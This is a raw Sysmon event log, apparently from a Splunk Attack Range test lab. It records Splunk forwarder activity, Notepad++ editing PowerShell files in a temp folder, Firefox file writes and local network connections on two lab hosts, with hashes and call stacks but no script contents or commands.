08:01:54.231{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:54.231{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6F2-60EB-B47D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6F2-60EB-B47D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.216{466BC892-F6F2-60EB-B47D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:51.464{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57388-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 11241100x80000000000000001052521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:55.788{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.ps12021-07-12 07:45:42.455 
23542300x80000000000000001052520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:55.787{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.ps1MD5=615C8F3EB8FC071E532A0252BEBCCC80,SHA256=CB8F4133557FB2EFB91D2A3DF7ECD71AD31D41E1F1B3F0C8BC7A996A68578352,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:55.723{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1C7DDE1C3F798DA52E45E5382435485,SHA256=0110DF78D3DAB522A200B66E3407B8207CB6644413491D84D0369099FF99B604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:55.423{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE27297E4D9714DE9614A1014CB96D3,SHA256=1914A0EF02A6FE9429B67EE8A77DB7EFFA33C2656F29E6E12FDCAAF839502B0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:55.225{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40A19937938C06556C73B58BBD938674,SHA256=BDE2DB7FB31C9C468E25E7AD1BB3B5266357DCB7BBAA4909AEFEB8BFD2E61E40,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001052522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:56.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E1803CFE41DEB255C3BA25AB838906D,SHA256=D08F8253DF70F49050613CE4191DF0DC3FE89FC65AF3985A69EDF83AAABC75B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:56.423{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADAF6E46002A72096FB92603DC28D75E,SHA256=171C8F471B3FAA822C1FE501B04D1DE46C50E14AC73A9CA9DFEDFA8A354C2602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED97C7A6BDE97BF996B131712ECD8F8F,SHA256=77206A5BEF96E571F49EBE1878019492294CDE9D7C7B7E15B94444BEAFB4FB5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:57.471{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C9D2CB721000CF8B1E3F4D855814373,SHA256=CA6B9F9D971439AED6F20CA5B123DE74E9B23F906D3C84792FF25A31C2007F23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.721{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\snap.datMD5=98CA20429706E9D45D68D72504A914C6,SHA256=F9BCF745A6DFA315C2A0FF52D31E2057193A9B52455457D473C1A185A1B134E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.721{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_records.datMD5=BB1A137FAD500FAAA0FAA3137BC6DD16,SHA256=C748ED42882B16341A1DFBC9B102FDB9179F2974D25EBB832275CDA874A32348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.721{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\fishbucket\splunk_private_db\snapshot.old\btree_index.datMD5=3426BC127D48B9738296E3B3FA58160E,SHA256=84068203FE8141D2CE833C5E081F5A88488A8D9FD6E92CB917D3901F9B75B5AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:57.238{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:58.738{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98ABE0008D2E7E39BDFC77D508325F9C,SHA256=A03535614334C08BEF47646AD9D0B18E7E02C3D4AD4E0D44DC4FACD071C72464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:58.474{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937C42E4321089FB9F2C2B972BE2AFC9,SHA256=3A31CABA222103716659627450F9AD7ACD9D44BDD856A38261AEF3E308465D12,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:51.772{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51166-false10.0.1.12-8000- 354300x80000000000000001052530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:50.755{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51165-false10.0.1.12-8089- 
23542300x80000000000000001052529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:59.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70314EF9B7F4E27109447DF36F171B80,SHA256=C4131A545FFC63C86E8F1B8EFADAD05C24EA785465D755CEA1E7101A8C597625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:59.474{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=671A28E163136D64BC28A6A5339E3BF5,SHA256=358AE3D4AF418890C0B20203FF85F5F0A545E2BA386FC397035D018D91887208,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:57.354{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57389-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:00.787{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8A4E9B9BCA3510A225FDD06A92C83AE,SHA256=DF633C6E2788EEBF66FCB36BEBC8B2F6229E6653CC2A27B82912AC1C6B82DA2B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:00.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F251AAA343AB71A5315C3728E7CBA93,SHA256=A79CBA880E2A6C160112B5E9EAA0928D3B4E59E72BE8DE6DA02A1C6AFFA3D80A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:01.806{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD7879C5D06B479E45A14D295AD89A03,SHA256=F88CB0B42161E7105421D8CD535A371AE26866D25C5312DC86258EC1C1EE8056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:01.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C845DC7BC507AE0B16935D50A2669C4B,SHA256=1858FDD348EE06EF16E23F8BDD28EC8C5FA4CBC5CF4BD8894F38FC48B254B6F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:02.836{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43FE0E75562B5E2FE52F63EC8012A5D2,SHA256=1B670B294AF7DC6324C1D13C84083FF84E977EDDB1409996645F2099FFD27CE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:02.521{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4136CF8455118E7133A8E1702F60F80F,SHA256=556729230BD8A11B1B8109B384118427FD5381FDF852575DB5E94AB101E0D7E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:03.867{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=984E3E2BD1BF6BF1C7DB843CC502145C,SHA256=028DA54C06D83ADE4B44BA2E639C5B507542F7533040400633064B569C33DB1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:03.536{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A4B1DCFE4B144BEABFA4A2475E99C1,SHA256=8A9A7C1DBF3E9E2FCD1B3A900C6294E8963D9769875C4E05B8B83C0EFDAFF9FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:04.968{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\sd1.ps1@2021-07-12_080204MD5=457BA6A7B9DE05DFC077C1EB0F67637B,SHA256=965DDBC1434AF839D2CBFD5C3E62F734340F809BA912373E1FEF6BCF7E7F8BF1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:04.952{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd1.ps12021-07-12 07:47:36.085 23542300x80000000000000001052538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:04.952{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd1.ps1MD5=BB87A22CABB0E1CBFD2B4B30711AA20C,SHA256=FA6EE1E8A154941D13A0F4520798BEDC4C573EFE7A1DA8CF9B2F30182DF2332E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:04.886{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5282FE460A4BB6A248D33675EB844085,SHA256=E8F486634C41E03E2DF5ABB53F2EB60FDFDF460D3BE454B868B297473C04ED71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:04.630{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=369D670A8AE046FF0DF446951D63624A,SHA256=3E4A8123F28792AFB636124A4170D2842DC476BFEBD34E1B696380EDA19BADCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:04.567{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=3A630F759D9ECA4E17AA87196C18B373,SHA256=5C7DF358A1A2BE2CED8D5E120344B08A5EF736DB779DCD156CC3E15BCABB81EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:03.325{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57390-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:05.905{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F3CC80DA4EB0967DC393F568131803A,SHA256=0037A651636B755945D6F3CEAAB3FD272663A15D52D8E873FAA04A73D615C250,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:05.661{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D3EE2703B2BC12ADF38FDC5F43A200,SHA256=66B84BD852FCBDD6FC3020C93C4B1E024DAED04A070E3ED73F9005565C4E07BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.906{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=778D912426A106BE0E46487EC357B38E,SHA256=46C1833F4BA2E12A899273FE04B8230CE246916894D6750F9EC0B89DD445EE90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:06.677{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ABB0EBCEEF1A6B426FCE161130A2056,SHA256=629B6D588FD36BA5D96C5EA7E33D1C814D945C8F6E23B2FCC5A0C82B9F144EE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.422{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:06.353{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001052545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.353{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla 